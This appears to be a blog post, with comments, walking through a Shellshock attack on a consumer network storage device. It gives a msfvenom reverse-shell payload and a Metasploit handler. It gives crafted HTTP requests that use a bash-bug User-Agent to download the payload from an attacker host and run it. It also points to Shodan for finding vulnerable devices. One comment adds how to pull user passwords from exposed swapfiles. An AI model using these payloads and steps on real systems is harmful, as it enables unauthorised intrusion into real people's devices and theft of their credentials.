Start with the payload:
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txtNow upload msf.txt to your web server. After the payload is uploaded open metasploit and
use exploit/multi/handlerThat should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:
set payload php/meterpreter/reverse_tcp
run
Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:GET /support/ HTTP/1.1Host: 5.6.7.8User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to our msfconsole window and see a session has opened. You wont have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!GET /support/ HTTP/1.1Host: 5.6.7.8User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it but you could try to use linux/x86/exec payload in bash bug exploit module to deploy and execute. This would allow you to keep it all in metasploit.
3 comments:
I have some trouble with this, can you help me please?
I can pay you (donate).
Whats the issue?
Hey! Good write up and great find. Found some other things you might be interested in. Most important is that you can get the users password since they expose the .swapfile as readable. One place to find is /mnt/eSata/.swapfile (might be the tmp for as well) the other place to find it is /home/0common/.swapfile With the bash bug it's as easy as running strings and grepping. Another password is exposed as well, but this one is for seagate customer service, grew for status serial.
Another fun tidbit is the /upgrade/ dir is also vuln just like /support/.
Also the bash bug itself doesn't need to use the User-Agent, but just any header that begins with a colon :
I reported these to seagate, but they say that since they patched the bash bug that the swapfile exposure doesn't need a patch.
Post a Comment